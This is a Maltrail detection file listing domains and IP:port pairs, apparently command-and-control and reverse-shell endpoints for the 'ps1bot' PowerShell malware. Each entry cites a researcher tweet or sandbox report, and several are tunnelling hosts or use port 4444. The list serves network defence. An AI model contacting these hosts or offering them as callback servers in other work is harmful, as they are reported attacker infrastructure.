# Copyright (c) 2014-2025 Maltrail developers (https://github.com/stamparm/maltrail/)
# See the file 'LICENSE' for copying permission

# Aliases: ps1bot

# Reference: https://twitter.com/ScumBots/status/1052260096422625281

ryenylittleleague.azureedge.net

# Reference: https://twitter.com/ScumBots/status/1053342340012744705

call.sysapi.net

# Reference: https://twitter.com/ScumBots/status/1053341937271476224

yi4qsyaprvlbephz.onion.to

# Reference: https://twitter.com/ScumBots/status/1059443242612203520

mypsh.ddns.net

# Reference: https://twitter.com/ScumBots/status/1060034869013700608

rekt.onthewifi.com

# Reference: https://twitter.com/ScumBots/status/1061987878987816960

leon-de-bruxelle.com

# Reference: https://twitter.com/ScumBots/status/1062368314670891008

frontieredevie.fr

# Reference: https://twitter.com/ScumBots/status/1066171943399903232

epelix-63870.portmap.io

# Reference: https://twitter.com/ScumBots/status/1069302264974721024

alphatool.serveo.net

# Reference: https://twitter.com/ScumBots/status/1069654505636139017

meterpreter.serveo.net

# Reference: https://twitter.com/ScumBots/status/1070687543543386114

it-pro.serveo.net

# Reference: https://twitter.com/ScumBots/status/1074270423804723200

globalact.gq

# Reference: https://twitter.com/ScumBots/status/1075034205472653312

0.tcp.ngrok.io

# Reference: https://twitter.com/ScumBots/status/1078973915840552960

manage-shope.com

# Reference: https://twitter.com/ScumBots/status/1079066477289005057

amazon34.duckdns.org

# Reference: https://twitter.com/ScumBots/status/1081939579693920257

rostelekom.pw

hack.localtunnel.digital-securite.ovh
digital-securite.ovh
kaliccbx.ddns.net

# Reference: https://twitter.com/ScumBots/status/1098326434274267142

195.3.146.86:443

# Reference: https://twitter.com/ScumBots/status/1100239578068328454

noticiasfinancieras.zapto.org

# Reference: https://twitter.com/ScumBots/status/1101069508419178503

46.29.163.222:9999

# Reference: https://twitter.com/ScumBots/status/1103395507546845190

leel.ddns.net

# Reference: https://twitter.com/ScumBots/status/1104348618335678464

104.145.231.114:8091

# Reference: https://twitter.com/ScumBots/status/1105065844005048321

91.211.88.131:5555

# Reference: https://twitter.com/ScumBots/status/1106460030218440709

95.179.235.70:443

# Reference: https://twitter.com/ScumBots/status/1106994800660807681

186.81.33.145:63000

# Reference: https://twitter.com/ScumBots/status/1107437718659891200

186.81.33.145:64000

# Reference: https://twitter.com/ScumBots/status/1107225070819332097

k.bank3.io

# Reference: https://twitter.com/ScumBots/status/1108808003829014530

noticiasfinancieras.zapto.org

# Reference: https://twitter.com/ScumBots/status/1110314175715311616

194.48.152.35:443

# Reference: https://twitter.com/ScumBots/status/1112449681454452736

159.89.214.31:42069

# Reference: https://twitter.com/ScumBots/status/1112450458700996608

193.161.193.99:40138

# Reference: https://twitter.com/ScumBots/status/1113317717300469760

95.213.251.165:7070

# Reference: https://twitter.com/ScumBots/status/1113955672138354688

186.81.33.145:64500

# Reference: https://twitter.com/ScumBots/status/1114833955822481408

151.80.60.117:6666

# Reference: https://twitter.com/ScumBots/status/1114849055501422593

47.95.251.134:8886

# Reference: https://twitter.com/ScumBots/status/1116428100286537728

78.192.98.226:4444

# Reference: https://twitter.com/ScumBots/status/1117790943208513537

52.15.72.79:14441

# Reference: https://twitter.com/ScumBots/status/1117793457999949824

5.19.4.164:4444

# Reference: https://twitter.com/ScumBots/status/1117808559637577730

52.15.72.79:10241

# Reference: https://twitter.com/ScumBots/status/1118058956298051584

185.242.21.78:80

# Reference: https://twitter.com/ScumBots/status/1118261545220345856

159.89.214.31:4343

# Reference: https://twitter.com/ScumBots/status/1119448112613986305

193.161.193.99:39125

# Reference: https://twitter.com/ScumBots/status/1119987918247006209

18.216.53.253:11712

# Reference: https://twitter.com/ScumBots/status/1120279841763483649

52.14.61.47:17369

# Reference: https://twitter.com/ScumBots/status/1121470183523201026

52.14.61.47:19552

# Reference: https://twitter.com/ScumBots/status/1121854255898472453

87.223.180.106:4444

# Reference: https://twitter.com/ScumBots/status/1121891714321518593

170.70.41.120:8080

# Reference: https://twitter.com/pmelson/status/1123226187348705281

193.161.193.99:34346

# Reference: https://twitter.com/ScumBots/status/1123531266593312774

185.202.174.118:80

# Reference: https://twitter.com/ScumBots/status/1124651146621194241

88.99.59.176:666

# Reference: https://twitter.com/ScumBots/status/1125841489181978625

3.92.243.227:4444

# Reference: https://twitter.com/ScumBots/status/1126122085405921280

194.5.250.129:443

# Reference: https://twitter.com/ScumBots/status/1126466859258327042

check.wittmann-it-security.org

# Reference: https://twitter.com/ScumBots/status/1131387542715150336

18.223.41.243:12432

# Reference: https://twitter.com/ScumBots/status/1132894210573643777

134.209.84.8:8082

# Reference: https://twitter.com/ScumBots/status/1133583150750343168

109.150.206.190:443

# Reference: https://twitter.com/ScumBots/status/1135807664200527873

193.161.193.99:54015

# Reference: https://twitter.com/ScumBots/status/1141761391621283846

46.177.202.34:5151

# Reference: https://twitter.com/ScumBots/status/1141794546570997760

91.200.103.24:443

# Reference: https://twitter.com/ItsReallyNick/status/1014522001900306433
# Reference: https://www.virustotal.com/gui/file/457282edec9eb312d6d99644c4a7c097b4c8984a023e255a5942b5dab5635a56/detection

52.17.157.98:445

# Reference: https://twitter.com/pmelson/status/1143536066781204481

aaa.stage.13171101.lol.intepi.net

# Reference: https://twitter.com/pmelson/status/1143527997888180234

179.43.160.219:80

# Reference: https://twitter.com/ScumBots/status/1143807370969210883

3.14.212.173:18032

# Reference: https://twitter.com/ScumBots/status/1143959624430829570

54.36.163.79:80

# Reference: https://twitter.com/ScumBots/status/1145504975939866624

116.206.228.203:7834

# Reference: https://twitter.com/ScumBots/status/1148985146550493188

190.166.86.4:4444

# Reference: https://twitter.com/ScumBots/status/1149750278842912768

194.99.22.146:443

# Reference: https://twitter.com/ScumBots/status/1150554457668751360

146.255.150.56:4444

# Reference: https://twitter.com/ScumBots/status/1151144078215700480

103.242.237.110:4446

# Reference: https://twitter.com/ScumBots/status/1151148452652421121

kurosan.ddns.net

# Reference: https://twitter.com/ScumBots/status/1151145809108512769

78.193.216.186:4446

# Reference: https://twitter.com/ScumBots/status/1151906993810083842

52.14.249.189:8080

# Reference: https://twitter.com/ScumBots/status/1156103391753506821

3.14.212.173:12313

# Reference: https://twitter.com/ScumBots/status/1156359755281195008

3.17.202.129:12313

# Reference: https://twitter.com/ScumBots/status/1156840752342818818

185.207.205.12:28741

# Reference: https://twitter.com/ScumBots/status/1157218238041866240

185.207.205.12:28742

# Reference: https://twitter.com/ScumBots/status/1159527654225301506

149.6.167.58:443

# Reference: https://twitter.com/ScumBots/status/1160356057207713792

95.144.8.33:4444

# Reference: https://twitter.com/ScumBots/status/1160550196004237312

3.19.3.150:12081

# Reference: https://twitter.com/ScumBots/status/1160550327273295872

3.14.212.173:12081

# Reference: https://twitter.com/ScumBots/status/1160537610718253056

18.223.41.243:19419

# Reference: https://twitter.com/ScumBots/status/1161082450140958720

194.5.250.105:443

# Reference: https://twitter.com/ScumBots/status/1161967029018071046

attem83.duckdns.org

# Reference: https://twitter.com/ScumBots/status/1162058130307584002

153.73.72.79:4444

# Reference: https://twitter.com/ScumBots/status/1165093924517625856

185.244.150.240:443

# Reference: https://twitter.com/ScumBots/status/1165422297328619521

18.223.41.243:12313

# Reference: https://twitter.com/ScumBots/status/1165808947657420800

18.223.41.243:15578

# Reference: https://twitter.com/ScumBots/status/1166415604384972800

18.223.41.243:14529

# Reference: https://twitter.com/ScumBots/status/1167576493758791681

45.45.76.113:1337

# Reference: https://twitter.com/ScumBots/status/1170326258372218880

82.102.24.42:4444

# Reference: https://twitter.com/ScumBots/status/1170357503370170368

104.154.246.115:443

# Reference: https://twitter.com/ScumBots/status/1171978786507808768

amazon34.duckdns.org

# Reference: https://twitter.com/i/status/1172612874708996096
# Reference: https://app.any.run/tasks/a2ddc0ed-5c0f-409e-bf26-457a9237ce3d/

159.246.29.114:443

# Reference: https://twitter.com/ScumBots/status/1173444749287710720

onezero0.net

# Reference: https://twitter.com/ScumBots/status/1176404662653730817

141.255.159.11:4444

# Reference: https://twitter.com/ScumBots/status/1178475870652116994

185.61.148.70:443

# Reference: https://twitter.com/VK_Intel/status/1179450328900685831

91.214.124.20:80

# Reference: https://twitter.com/ScumBots/status/1180077281714348033

45.62.225.56:443

# Reference: https://twitter.com/ScumBots/status/1180114767970803712

3.92.243.227:4444

# Reference: https://twitter.com/ScumBots/status/1180121450092617728

27.164.5.106:16728

# Reference: https://twitter.com/ScumBots/status/1180887202265489409

185.92.74.29:4444

# Reference: https://twitter.com/ScumBots/status/1180977806920036353

185.92.74.29:35555

# Reference: https://twitter.com/ScumBots/status/1181239022875824131

3.17.202.129:13147

# Reference: https://twitter.com/ScumBots/status/1181435313270525953

psycho.ooguy.com

# Reference: https://twitter.com/ScumBots/status/1183274933348192258

tronium.ddns.net

# Reference: https://twitter.com/ScumBots/status/1183654188192014337

3.19.3.150:19416

# Reference: https://twitter.com/pmelson/status/1184143380294619137

137.218.255.213:22849

# Reference: https://twitter.com/ScumBots/status/1186090265611767808

193.161.193.99:49202

# Reference: https://twitter.com/ScumBots/status/1186624502945517569

3.92.243.227:4444

# Reference: https://twitter.com/ScumBots/status/1188695655608455173

76.218.94.80:4444

# Reference: https://twitter.com/ScumBots/status/1190274811139969024

18.223.41.243:17192

# Reference: https://twitter.com/ScumBots/status/1190807095806963713

18.223.41.243:19650

# Reference: https://twitter.com/DidierStevens/status/1192870847217840131

3.134.31.210:8080

# Reference: https://twitter.com/ScumBots/status/1193726301967917057

18.188.14.65:14404

# Reference: https://twitter.com/ScumBots/status/1195001191253643270

5.175.214.20:18880

# Reference: https://twitter.com/ScumBots/status/1195118477520121856

5.94.121.244:4444

# Reference: https://twitter.com/ScumBots/status/1195564311982354433

192.241.132.33:4433

# Reference: https://twitter.com/ScumBots/status/1195729497934508035

186.10.116.109:4455

# Reference: https://twitter.com/ScumBots/status/1196883776405725191

df98fdslkjfs.red

# Reference: https://twitter.com/ScumBots/status/1197508727001305089

85.152.6.30:8080

# Reference: https://twitter.com/ScumBots/status/1200520713536491520

185.174.172.201:443

# Reference: https://twitter.com/ScumBots/status/1200716613202391040

193.161.193.99:56282

# Reference: https://twitter.com/ScumBots/status/1200720388281569280

192.241.133.27:4466

# Reference: https://twitter.com/ScumBots/status/1201587934127886338

telastex.net

# Reference: https://twitter.com/ScumBots/status/1201978181139550210

24.52.217.77:5443

# Reference: https://twitter.com/ScumBots/status/1203528860098281472

updateqdb.com

# Reference: https://twitter.com/ScumBots/status/1204219193698267146

134.209.84.8:8082

# Reference: https://twitter.com/ScumBots/status/1204414044804800517

92.84.116.3:1911

# Reference: https://twitter.com/ScumBots/status/1206925775464796163

18.188.14.65:12260

# Reference: https://twitter.com/ScumBots/status/1210387460083073025

217.80.20.213:1515

# Reference: https://www.virustotal.com/gui/file/cfc2bd30cdeacd9c3a91259f0013778d4e5436871e929f10c1cd8d7b14b041a7/detection

18.223.41.243:18113
3.17.202.129:18113
3.19.3.150:18113

# Reference: https://www.virustotal.com/gui/file/0320d90a95fbb080763f71deb3148f32bf78abf8f10286dcf118c0e36a936292/detection

3.14.212.173:4040
3.17.202.129:16416

# Reference: https://www.virustotal.com/gui/file/b537f1d14d0524c436532ea2be7d0fe51ce543886b477a8517480fc68dc57a6b/detection

3.17.202.129:13841

# Reference: https://www.virustotal.com/gui/file/95f1ea0b38a61e7778ef017e091206f99f13ded7ddf2fc36a20de8da70055e12/detection

3.17.202.129:12010

# Reference: https://www.virustotal.com/gui/file/70bba627efb3ff53f0175adc91f8475fbaf2a7cad3d6a804b80d75abe7381b74/detection

3.14.212.173:15905

# Reference: https://www.virustotal.com/gui/file/3e4e78dd9cbddd1800d0891ef95f6f5bda212bcbb1a069f2fbaaba3668ac85f7/detection

3.14.212.173:12734

# Reference: https://www.virustotal.com/gui/file/a3ed5434cd0962e13e85377f3e2737b027d75f46445ce2410dc5538164242be9/detection

3.17.202.129:17299
3.19.114.185:17299

# Reference: https://www.virustotal.com/gui/file/695b9ca3cd336e0372732e0d5227ca0e58da1dfc3298615e9c0ace25cb1baf3d/detection

18.188.14.65:15344
3.17.202.129:15344

# Reference: https://www.virustotal.com/gui/file/27b0e998a7920147e7d58753f1d8d96dbbaec541076e5361a04324a9753081f2/detection

3.14.212.173:17035
3.17.202.129:17035

# Reference: https://www.virustotal.com/gui/file/14fe05562eeefb83448360308522709a31db34955de01bca438965af343c66a6/detection

18.223.41.243:11265

# Reference: https://www.virustotal.com/gui/file/5638ed9a9d4ea35e861d344441a2e5b1e4cdcfc358c8c7dd077574dd49657a3d/detection

96ac532a.ngrok.io

# Reference: https://www.virustotal.com/gui/file/cd8b19cbe08a2ace933b9f3e631d4752c1f8f56e04646c03510877cda5c87e3d/detection

193.161.193.99:49202

# Reference: https://www.virustotal.com/gui/file/13843c62906ce22307c6861b25b5e8672aa1766f4e41cb425a0c9468a6823085/detection

193.161.193.99:63420

# Reference: https://www.virustotal.com/gui/file/25cd26e740426b51a966a2c1c4888496c27bba7abf12589fae98394f3550e027/detection

3.19.3.150:15492

# Reference: https://www.virustotal.com/gui/file/cfc2bd30cdeacd9c3a91259f0013778d4e5436871e929f10c1cd8d7b14b041a7/detection

18.223.41.243:18113
3.17.202.129:18113
3.19.3.150:18113

# Reference: https://www.virustotal.com/gui/file/66bc47048c508f0bde60a88deb339e914b6f3c60bb1b2256e83d118bf3dad928/detection

3.19.3.150:80

# Reference: https://www.virustotal.com/gui/file/4c63034454f490a8ed01a7685e1606d32da5e7f301d3538bccf4f7de5e41bd66/detection

3.19.3.150:19416

# Reference: https://www.virustotal.com/gui/file/2bb71dbfb2ccf9eddb7143437a2b430181d472fce6b819426b8c4e3ce1f5bf82/detection

3.19.3.150:11036

# Reference: https://www.virustotal.com/gui/file/c7157233ddc1df83112d6eb3466180b3347f1069d8b878d424747508ccd9d949/detection

3.19.114.185:15344
3.19.3.150:15344

# Reference: https://www.virustotal.com/gui/file/8835a022439a0b630a2c2eba40b9bcf0432cb8d68d7a0060a1a44246cec29ab2/detection

3.19.3.150:11317

# Reference: https://www.virustotal.com/gui/file/7d60fd1bbf98b86ead194f76bf4413f9a70b91567037c015156a5c70d7c7a5eb/detection

3.19.3.150:29038

# Reference: https://www.virustotal.com/gui/file/bc4689aab804e44f23cf60bb9bc4c17bd68b73224f7267d1a0d41c3d55af4458/detection

185.101.92.3:1777

# Reference: https://www.virustotal.com/gui/file/218d24468418a0b6fd800a464ba64aeea42add82a11c284ee094076555c3d237/detection

trszrfea.ddns.net

# Reference: https://www.virustotal.com/gui/file/73562ccfd6dc94c59dcd691aceccdf1eeee089ff69a041234f3bf65dc218bbab/detection

185.101.92.3:8636

# Reference: https://twitter.com/c3rb3ru5d3d53c/status/1213831684791123969

23.227.207.185:444

# Reference: https://twitter.com/ScumBots/status/1215378978212646927

107.191.46.239:14293

# Reference: https://twitter.com/ScumBots/status/1217633122059259905

newsrecordmusic112.monster

# Reference: https://twitter.com/ScumBots/status/1217920265478459395

194.99.22.145:443

# Reference: https://twitter.com/ScumBots/status/1217922012481556480

45.153.186.51:443

# Reference: https://twitter.com/ScumBots/status/1217872955310530560

185.244.150.5:4444

# Reference: https://twitter.com/ScumBots/status/1218660424876462082

137.224.106.4:73

# Reference: https://twitter.com/ScumBots/status/1218849343442210816

3.17.202.129:11591

# Reference: https://www.virustotal.com/gui/file/c15ecbb84c15839556f39589f7f513dc3785b5ac727ba26f2d29b9993661696f/detection

185.27.134.11:24004

# Reference: https://twitter.com/ScumBots/status/1219796839031103494

165.227.61.185:443

# Reference: https://twitter.com/ScumBots/status/1219988825130356736
# Reference: https://www.virustotal.com/gui/domain/officestorage.org/relations

185.245.84.106:443
officestorage.org

# Reference: https://twitter.com/ScumBots/status/1219998021926182924

185.165.168.226:443
virtualofficeroom.com

# Reference: https://twitter.com/ScumBots/status/1220180618132316160

fearlesslyhuman.org

# Reference: https://twitter.com/ScumBots/status/1190345274872532993

c2.virus.eu

# Reference: https://twitter.com/ScumBots/status/1183048566929002496

3.8.236.109:443

# Reference: https://twitter.com/ScumBots/status/1218566229264343041

autodiscover.cisco-gateway.com

# Reference: https://www.virustotal.com/gui/file/09f1ee55ee6d228e8bca7120191ef4160294a2b45743ba2b52449f4bd6fd730f/detection (# Nishang)

3.17.202.129:16437

# Reference: https://twitter.com/ScumBots/status/1220945633625935872 (# Nishang)

3.17.202.129:11353

# Reference: https://twitter.com/ScumBots/status/1220945728811552773 (# Nishang)

3.17.202.129:17008

# Reference: https://twitter.com/ScumBots/status/1220946013600518144 (# Nishang)

3.17.202.129:17413

# Reference: https://twitter.com/ScumBots/status/1220945586955964418 (# Nishang)

3.17.202.129:19355

# Reference: https://twitter.com/ScumBots/status/1220945824517173248 (# Nishang)

3.17.202.129:14901

# Reference: https://twitter.com/ScumBots/status/1220945776081326085 (# Nishang)

3.17.202.129:12022

# Reference: https://twitter.com/ScumBots/status/1220945964506107904 (# Nishang)

3.17.202.129:16264

# Reference: https://twitter.com/ScumBots/status/1220945917223874561 (# Nishang)

3.17.202.129:18777

# Reference: https://twitter.com/ScumBots/status/1220945680551895040 (# Nishang)

3.17.202.129:16437

# Reference: https://twitter.com/ScumBots/status/1220945870386012160 (# Nishang)

3.17.202.129:10146

# Reference: https://twitter.com/ScumBots/status/1221394913562124289 (# Nishang)

3.17.202.129:18163

# Reference: https://twitter.com/ScumBots/status/1221410012804911105 (# Nishang)

3.17.202.129:12205

# Reference: https://twitter.com/ScumBots/status/1221437692157865984 (# Nishang)

3.17.202.129:11916

# Reference: https://twitter.com/ScumBots/status/1221445243301715970 (# Nishang)

3.17.202.129:15404

# Reference: https://twitter.com/ScumBots/status/1221467894363705344 (# Nishang)

3.17.202.129:15173

# Reference: https://twitter.com/ScumBots/status/1222242996755845120 (# Nishang)

3.17.202.129:19733

# Reference: https://twitter.com/ScumBots/status/1222265648564273153 (# Nishang)

3.17.202.129:10418

# Reference: https://twitter.com/ScumBots/status/1222532412279808000 (# Nishang)

3.17.202.129:10740

# Reference: https://twitter.com/ScumBots/status/1222597835474030592 (# Nishang)

3.17.202.129:17202

# Reference: https://twitter.com/ScumBots/status/1222814262403399680 (# Nishang)

3.17.202.129:11400

# Reference: https://twitter.com/ScumBots/status/1223586875371401217 (# Nishang)

3.17.202.129:14379

# Reference: https://twitter.com/ScumBots/status/1223654823356256256 (# Nishang)

3.17.202.129:15404

# Reference: https://twitter.com/ScumBots/status/1223994559912464386 (# Nishang)

3.17.202.129:14766

# Reference: https://twitter.com/ScumBots/status/1223994628220866560 (# Nishang)

3.17.202.129:15676

# Reference: https://twitter.com/ScumBots/status/1222207486062735363

82.31.142.196:80
whipped.duckdns.org

# Reference: https://twitter.com/ScumBots/status/1222451876064526337

45.32.72.237:443

# Reference: https://twitter.com/ScumBots/status/1222517422483288065

bankingadvice.net

# Reference: https://twitter.com/ScumBots/status/1222576942748250114

27.4.98.173:443

# Reference: https://www.virustotal.com/gui/file/f5f0d36874f9e69329601f2334b6d4f218bafe857b3cbb5f9e8ad13d328f0d51/detection

weirdly.crabdance.com

# Reference: https://www.virustotal.com/gui/file/611e4ecdf7e7db5e2308f3af69d01a4a28866aa3b434d77f7a2b7a95a8faf292/detection

194.5.98.139:444

# Reference: https://www.virustotal.com/gui/file/bb11f097959ea9c8854e064fb63008f0fd3916f13ad9437762b133663613b56d/detection

178.124.140.147:444

# Reference: https://twitter.com/ScumBots/status/1223577316024115200

51.159.56.13:32042

# Reference: https://www.virustotal.com/gui/file/f5f0d36874f9e69329601f2334b6d4f218bafe857b3cbb5f9e8ad13d328f0d51/detection

185.148.241.50:444

# Reference: https://twitter.com/ScumBots/status/1225790150564859905

18.223.41.243:14272

# Reference: https://twitter.com/ScumBots/status/1225807757019840512

18.223.41.243:14272

# Reference: https://twitter.com/pmelson/status/1226248009786236928

58.96.92.95:38900

# Reference: https://twitter.com/ScumBots/status/1226278360436924416

renovatesystem.com

# Reference: https://www.virustotal.com/gui/file/cb4778c05f0c2635000bd05e42070994568e9e4d992e32536c406217fb5b063e/detection

185.101.92.3:1204
danger11.duckdns.org

# Reference: https://www.virustotal.com/gui/file/143aea5d387c714790accdfa13a9cd0f6eef6b7b957b5c3b2f3a9e4e3e03c4b5/detection

27.63.179.85:1202

# Reference: https://www.virustotal.com/gui/file/3b436a5c83b85b2734a34367a488d7ea59b086708b5c2c2582265607fab36adf/detection

185.101.92.3:1209
27.63.162.41:1209

# Reference: https://twitter.com/ScumBots/status/1226967904626913281

46.119.226.171:4444

# Reference: https://twitter.com/ScumBots/status/1226906959946899457

94.156.189.250:443

# Reference: https://twitter.com/ScumBots/status/1228827730038398977

185.147.15.22:443

# Reference: https://twitter.com/ScumBots/status/1229078059871096832
# Reference: https://www.virustotal.com/gui/file/a1c29c076b654c070bad23d0d49018e7e6b54bf4cc942da9b59aec6c7f086d26/detection

139.59.145.48:80

# Reference: https://twitter.com/ScumBots/status/1229751243075092487

137.224.106.4:73

# Reference: https://twitter.com/ScumBots/status/1229647311187386368

3.17.148.164:4444

# Reference: https://twitter.com/ScumBots/status/1231132845567025152

41.242.125.159:9326

# Reference: https://twitter.com/ScumBots/status/1231146688389242881

46.19.138.139:8080

# Reference: https://www.virustotal.com/gui/ip-address/45.66.250.11/relations

45.66.250.11:443
45.66.250.11:80

# Reference: https://twitter.com/ScumBots/status/1232300541243535364
# Reference: https://www.virustotal.com/gui/ip-address/209.97.190.80/relations

209.97.190.80:80

# Reference: https://twitter.com/ScumBots/status/1232427628751179778

2.58.47.203:51022

# Reference: https://twitter.com/ScumBots/status/1232842863211315202

empire.hillsclerk.us

# Reference: https://twitter.com/ScumBots/status/1232864255902470145

203.132.95.52:4444

# Reference: https://twitter.com/ScumBots/status/1233415444608036870

45.77.65.211:443

# Reference: https://app.any.run/tasks/e84e3cdc-9ba0-4756-ab1d-fcd49627310a/

3.19.3.150:19011
3.19.3.185:19011

# Reference: https://app.any.run/tasks/41e07e9b-b2c7-4a68-a753-bac8af8b5129/

18.223.41.243:19011

# Reference: https://app.any.run/tasks/7f128fa7-fb0d-4dee-9030-838756962045/

3.17.202.129:16276

# Reference: https://app.any.run/tasks/a24f9f91-7f49-4c39-9fd7-a201823e0dd3/

18.223.41.243:17037

# Reference: https://app.any.run/tasks/be1bef6c-d7e1-48bd-8615-36ae937e5149/

51.79.13.195:443

# Reference: https://app.any.run/tasks/d28a0271-4c99-41db-b465-6b8f491be0f7/

18.188.14.65:17085

# Reference: https://app.any.run/tasks/b2e3dce5-0431-49b8-bfa9-755ede26669f/

3.17.202.129:17085

# Reference: https://app.any.run/tasks/45c2192e-d4aa-4c9f-8023-df08ce3fe263/

18.223.41.243:17085

# Reference: https://app.any.run/tasks/caee7291-f505-434f-9776-f3823f800924/

3.19.3.150:19926

# Reference: https://app.any.run/tasks/614143b4-f937-4440-a6fa-75104cbe3749/

3.19.3.150:17085

# Reference: https://app.any.run/tasks/371b7c11-6ca7-4b47-9c7f-3fb2a2925778/

18.223.41.243:19926

# Reference: https://app.any.run/tasks/b78b0de3-6fec-48ed-8fec-2b89eded1ccf/

18.223.41.243:12297

# Reference: https://app.any.run/tasks/4d8c492a-5e93-44a2-ae25-de5b0c42995a/

3.19.114.185:19926

# Reference: https://app.any.run/tasks/3fc8bb68-e8c2-4fa7-933b-f4d2f3311f86/

3.19.114.185:12297

# Reference: https://app.any.run/tasks/ff1c77ac-741d-4fe3-88f2-078703b8b554/

3.19.3.150:13705

# Reference: https://app.any.run/tasks/2b671d09-a141-4182-89fc-8b22f82ce17c/

18.188.14.65:18003

# Reference: https://app.any.run/tasks/919c78ff-42e7-4a31-bf86-e049acd51087/

3.17.202.129:18460

# Reference: https://app.any.run/tasks/20629c84-f053-43b8-92f6-a5ac72e0ec0e/

3.19.3.150:14975

# Reference: https://app.any.run/tasks/8042e101-7155-420d-9341-d3465ca67200/

5.199.167.188:443

# Reference: https://app.any.run/tasks/02bec560-ffa8-4dd1-a454-0ed53a8e5477/

18.223.41.243:17697

# Reference: https://app.any.run/tasks/d32fdbff-318b-47f7-a4fb-b6a0ea43dd31/

45.147.230.255:443

# Reference: https://app.any.run/tasks/27766850-f078-4c83-b3b9-efb0555102a5/

95.179.223.7:443

# Reference: https://app.any.run/tasks/1f8f95bd-c468-44df-a85d-a12db4b6bec5/

23.227.207.185:444

# Reference: https://app.any.run/tasks/4bcf6d77-73c1-474b-880d-8336b4e2b684/

5.252.176.28:443

# Reference: https://app.any.run/tasks/47215b69-0652-4d00-a3b7-b0105d8bc6f8/

154.194.3.229:443

# Reference: https://app.any.run/tasks/56966ffa-ce51-43ee-b0f3-ea4d7255700b/

106.13.161.43:8008

# Reference: https://app.any.run/tasks/dbabc592-e5ba-4aac-baa2-cab401522d58/

108.62.141.34:443

# Reference: https://app.any.run/tasks/41364a08-e861-4c8b-8667-191853c31580/

91.214.124.64:443

# Reference: https://app.any.run/tasks/ee44f6c0-2aeb-4850-ae2f-3ffdba532096/

79.137.36.9:4444

# Reference: https://app.any.run/tasks/40c32568-72c6-49fe-b168-a9dbe611d15a/

37.48.83.137:443

# Reference: https://app.any.run/tasks/41511d60-4804-4d84-83d8-b17b58e8d119/

47.95.210.165:8088

# Reference: https://twitter.com/ScumBots/status/1235898016126636032

amazn.cloud

# Reference: https://twitter.com/ScumBots/status/1237294702384291840
# Reference: https://www.virustotal.com/gui/file/2fce54f19cc11e9bea9a18952cae872d43d22bfba1e3bbb393ed9a94cd41ac0e/detection

manulife.ca-syschk.net

# Reference: https://twitter.com/James_inthe_box/status/1237491709824516096
# Reference: https://twitter.com/ScumBots/status/1237494768000614400

107.4.90.214:666

# Reference: https://twitter.com/ScumBots/status/1237851828500365317
# Reference: https://www.virustotal.com/gui/file/6c97dbef34d64b48f0f774e458bbc25f38b902b3c2f3e819e3b276c781511603/detection

newsrecordmusic112.monster

# Reference: https://twitter.com/ScumBots/status/1237898455797792769

185.92.74.29:35555

# Reference: https://twitter.com/ScumBots/status/1237898529734967298

185.211.245.139:8744

# Reference: https://twitter.com/ScumBots/status/1237898605979025409

ahost.rythmstick.net

# Reference: https://twitter.com/ScumBots/status/1238045901559607296

3.120.130.166:4444

# Reference: https://twitter.com/ScumBots/status/1238198152789966850

217.182.54.208:5490

# Reference: https://twitter.com/ScumBots/status/1238427161482211328

77.72.131.69:443

# Reference: https://twitter.com/malwrhunterteam/status/1238433863862550535

34.217.82.194:4444

# Reference: https://twitter.com/ScumBots/status/1238564315239768065

68.202.129.2:444

# Reference: https://twitter.com/ScumBots/status/1238761868623306752
# Reference: https://twitter.com/StopMalvertisin/status/1631629929845764097
# Reference: https://www.virustotal.com/gui/file/a21154a8f1e40e4c15a68c15c1fd3d0b2f2d227c55d328c05425c19f97a825cc/detection

3.90.140.45:8080
35.170.96.22:8080
54.80.171.208:8080
emp.fourhorsemen.tech

# Reference: https://twitter.com/ScumBots/status/1238764388259168257

bankingadvice.net

# Reference: https://www.virustotal.com/gui/file/daab59d033ea03ebeb8a80666895c703f84be5e55d0652d28018c38419b0b1b7/detection

79.134.225.87:7519

# Reference: https://twitter.com/ScumBots/status/1239777308426350592

LostSec.duckdns.org

# Reference: https://twitter.com/ScumBots/status/1239831415941988352
# Reference: https://www.virustotal.com/gui/ip-address/83.171.237.192/relations

83.171.237.192:443

# Reference: https://twitter.com/ScumBots/status/1239828901699948544

185.189.183.47:443

# Reference: https://twitter.com/ScumBots/status/1241030568860672000

78.98.10.243:6969

# Reference: https://twitter.com/ScumBots/status/1241330107983237120

193.161.193.99:48650

# Reference: https://www.virustotal.com/gui/file/0102a1e5c866802c447fd541a064deb0649989766797fce6c66710661644a2ae/detection

3.135.90.78:19505

# Reference: https://twitter.com/ScumBots/status/1242039722723196928

185.244.30.75:5544

# Reference: https://twitter.com/ScumBots/status/1242403412077096961

youtube-au.com

# Reference: https://twitter.com/ScumBots/status/1242561911541182464

45.147.229.143:1499

# Reference: https://twitter.com/ScumBots/status/1243837813843537920

3.90.140.45:8080
emp.fourhorsemen.tech

# Reference: https://twitter.com/ScumBots/status/1243842847016615936

3.133.136.228:8080

# Reference: https://twitter.com/ScumBots/status/1243835299656056832

195.2.92.129:8080

# Reference: https://twitter.com/ScumBots/status/1243832784256487424

119.28.226.59:8080

# Reference: https://twitter.com/ScumBots/status/1244671656490078211

193.161.193.99:25820

# Reference: https://twitter.com/ScumBots/status/1244679610975105033

193.161.193.99:59646

# Reference: https://twitter.com/ScumBots/status/1244677096301105153

193.161.193.99:5555

# Reference: https://twitter.com/ScumBots/status/1244671587292532738
# Reference: https://www.virustotal.com/gui/file/871931280a302e93984da3c771823100ac5bba0d8f57b0fb9311966f58563de3/detection

139.162.161.211:11320
139.162.161.211:12130

# Reference: https://twitter.com/notajungman/status/1245737937419079680
# Reference: https://app.any.run/tasks/92024127-dfc1-43eb-8f67-f06cd80c473a/

us.palodevops.com

# Reference: https://www.virustotal.com/gui/file/03dd215f9bea6267537736d045f61cd1168e18a1e713550a5d4b847a8dbd563d/detection

171.5.183.76:2516
171.5.188.210:2516
flukez.ddns.net

# Reference: https://twitter.com/ScumBots/status/1250583513147064321

pastebin-sucks-now.biz

# Reference: https://twitter.com/ScumBots/status/1251780150959788032

134bd4b7.ngrok.io

# Reference: https://www.virustotal.com/gui/file/7829b5e1783d04dbbf18d2f482ca5a231c706b06183d53138c8561b0f60d1101/detection

141.255.154.68:4444

# Reference: https://www.virustotal.com/gui/file/86fca38ef2f17c94467cacf4a016c4f1e72d43ca847b99ee04244a4395029892/detection

77.223.232.41:8080

# Reference: https://twitter.com/ScumBots/status/1257468572051353605

sumo.twcug.net

# Reference: https://twitter.com/ScumBots/status/1257510386238177281

162.241.114.106:443

# Reference: https://twitter.com/ScumBots/status/1257510600827121667

3.19.3.150:18415

# Reference: https://app.any.run/tasks/cdb3201c-b063-436f-872a-7527ec118ed9/

